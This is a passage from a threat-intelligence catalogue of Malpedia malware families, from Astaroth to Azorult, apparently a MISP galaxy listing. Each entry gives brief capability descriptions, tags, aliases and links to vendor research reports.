First spotted in the wild in 2017, Astaroth is a highly prevalent, information-stealing Latin American banking trojan. It is written in Delphi and has some innovative execution and attack techniques. Originally, this malware variant targeted Brazilian users, but Astaroth now targets users both in North America and Europe.

The tag is: misp-galaxy:malpedia="Astaroth"

Astaroth is also known as:

  • Guildma

Table 2917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/

https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/

https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/

https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/

https://blog.easysol.net/meet-lucifer-international-trojan/

https://isc.sans.edu/diary/27482

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/

https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt

https://blog.talosintelligence.com/2020/05/astaroth-analysis.html

https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf

Astasia

Astasia is a banking trojan that spreads through phishing emails that contain an executable attachment. Once the attachment is executed, Astasia downloads and installs a trojan that runs in the background. The trojan can steal personal information, such as passwords and credit card numbers, from victims.

The tag is: misp-galaxy:malpedia="Astasia"

Astasia is also known as:

Table 2918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.astasia

https://twitter.com/MalGamy12/status/1690100567756906497

AsyncRAT

AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.

The tag is: misp-galaxy:malpedia="AsyncRAT"

AsyncRAT is also known as:

Table 2920. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

https://www.secureworks.com/research/darktortilla-malware-analysis

https://twitter.com/MsftSecIntel/status/1392219299696152578

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf

https://community.riskiq.com/article/3929ede0/description

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies

https://labs.k7computing.com/?p=21759

https://mssplab.github.io/threat-hunting/2023/05/19/malware-src-asyncrat.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://community.riskiq.com/article/ade260c6

https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://twitter.com/vxunderground/status/1519632014361640960

https://blog.netlab.360.com/purecrypter

https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html

https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/

https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

https://community.riskiq.com/article/24759ad2

https://embee-research.ghost.io/shodan-censys-queries/

https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://blog.morphisec.com/syk-crypter-discord

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://eln0ty.github.io/malware%20analysis/asyncRAT/

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html

https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader

https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

https://embee-research.ghost.io/unpacking-malware-using-process-hacker-and-memory-inspection/

https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

https://www.linkedin.com/feed/update/urn:li:activity:7137086303329783808/

https://assets.virustotal.com/reports/2021trends.pdf

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/

https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://aidenmitchell.ca/asyncrat-via-vbs/

https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html

https://www.esentire.com/blog/asyncrat-activity

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://embee-research.ghost.io/unpacking-net-malware-with-process-hacker/

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html

https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/

https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html

https://twitter.com/ESETresearch/status/1449132020613922828

Athena

Part of the Mythic framework, payload in C# (.NET 6), support HTTP, Websockets, Slack, SMB for C2.

The tag is: misp-galaxy:malpedia="Athena"

Athena is also known as:

Table 2922. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.athena

https://cyble.com/blog/threat-actor-deploys-mythics-athena-agent-to-target-russian-semiconductor-suppliers/

AthenaGo RAT

The tag is: misp-galaxy:malpedia="AthenaGo RAT"

AthenaGo RAT is also known as:

Table 2923. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago

ATI-Agent

The tag is: misp-galaxy:malpedia="ATI-Agent"

ATI-Agent is also known as:

Table 2924. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

ATMii

The tag is: misp-galaxy:malpedia="ATMii"

ATMii is also known as:

Table 2926. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii

https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/

ATMSpitter

The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both libraries are legitimate Windows drivers used to interact with the components of different ATM models.

The tag is: misp-galaxy:malpedia="ATMSpitter"

ATMSpitter is also known as:

Table 2929. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter

https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf

https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf

https://www.secureworks.com/research/threat-profiles/gold-kingswood

http://www.secureworks.com/research/threat-profiles/gold-kingswood

Attor

Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.

Attor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.

The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim’s screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.

The tag is: misp-galaxy:malpedia="Attor"

Attor is also known as:

Table 2931. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.attor

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html

https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform

https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/

AuKill

According to Sophos, the AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.

The tag is: misp-galaxy:malpedia="AuKill"

AuKill is also known as:

  • SophosKill

Table 2933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

Aurora Stealer

First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets, local systems, and act as a loader. During execution, the malware runs several commands through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server within a single base64-encoded JSON file.

The tag is: misp-galaxy:malpedia="Aurora Stealer"

Aurora Stealer is also known as:

Table 2936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer

https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/

https://d01a.github.io/aurora-stealer/

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer

https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219

https://d01a.github.io/aurora-stealer-builder/

https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/

https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html

https://isc.sans.edu/diary/rss/29448

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

The tag is: misp-galaxy:malpedia="Avaddon"

Avaddon is also known as:

Table 2937. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://twitter.com/dk_samper/status/1348560784285167617

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.connectwise.com/resources/avaddon-profile

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/

https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/

https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/

https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.swascan.com/it/avaddon-ransomware/

https://arxiv.org/pdf/2102.04796.pdf

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis

https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://twitter.com/Securityinbits/status/1271065316903120902

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.tgsoft.it/files/report/download.asp?id=568531345

AvastDisabler

The tag is: misp-galaxy:malpedia="AvastDisabler"

AvastDisabler is also known as:

Table 2938. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler

https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/

AVCrypt

Bleeping Computer notes about discovery of AVCrypt, a malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, as it removes numerous services, including Windows Update, and provides no contact information, this ransomware may be a wiper.

The tag is: misp-galaxy:malpedia="AVCrypt"

AVCrypt is also known as:

Table 2939. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt

https://twitter.com/malwrhunterteam/status/976925447043846145

https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/

AvD Crypto Stealer

Cyble Research discovered this .Net written malware dubbed "AvD Crypto Stealer". The name of this malware is misleading, because this is a kind of clipper malware. Assumption of Cyble is, that this malware could target other threat actors as scenario.

The tag is: misp-galaxy:malpedia="AvD Crypto Stealer"

AvD Crypto Stealer is also known as:

Table 2940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avd

https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/

Ave Maria

Information stealer which uses AutoIT for wrapping.

The tag is: misp-galaxy:malpedia="Ave Maria"

Ave Maria is also known as:

  • AVE_MARIA

  • AveMariaRAT

  • Warzone RAT

  • WarzoneRAT

  • avemaria

Table 2942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat

https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies

https://blog.yoroi.company/research/the-ave_maria-malware/

https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://www.youtube.com/watch?v=-G82xh9m4hc

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://www.youtube.com/watch?v=81fdvmGmRvM

https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat

https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://www.youtube.com/watch?v=T0tdj1WDioM

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA

https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf

https://blog.morphisec.com/syk-crypter-discord

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.talosintelligence.com/attributing-yorotrooper/

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://reaqta.com/2019/04/ave_maria-malware-part1/

https://muha2xmad.github.io/malware-analysis/warzonerat/

https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/

https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/warzonerat/warzonerat_config_extraction.ipynb

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://asec.ahnlab.com/en/36629/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://securelist.com/apt-trends-report-q3-2020/99204/

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery

https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

AvosLocker

AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.

In March 2022, the FBI and US Treasury Department issued a warning about the attacks.

The tag is: misp-galaxy:malpedia="AvosLocker"

AvosLocker is also known as:

Table 2943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker

https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/

https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://www.ic3.gov/Media/News/2022/220318.pdf

https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf

https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux

Unidentified 061 (Windows)

Was previously wrongly tagged as PoweliksDropper, now looking for additional context.

The tag is: misp-galaxy:malpedia="Unidentified 061 (Windows)"

Unidentified 061 (Windows) is also known as:

Table 2944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon

Ayegent

The tag is: misp-galaxy:malpedia="Ayegent"

Ayegent is also known as:

Table 2947. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent

Aytoke

Keylogger.

The tag is: misp-galaxy:malpedia="Aytoke"

Aytoke is also known as:

Table 2948. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke

https://snort.org/rule_docs/1-34217

https://www.youtube.com/watch?v=FttiysUZmDw

Azorult

AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.

The tag is: misp-galaxy:malpedia="Azorult"

Azorult is also known as:

  • PuffStealer

  • Rultazo

Table 2949. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

https://twitter.com/DrStache_/status/1227662001247268864

https://securelist.com/azorult-analysis-history/89922/

https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html

https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html

https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/

https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/

https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html

https://asec.ahnlab.com/en/26517/

https://www.youtube.com/watch?v=EyDiIAtdI

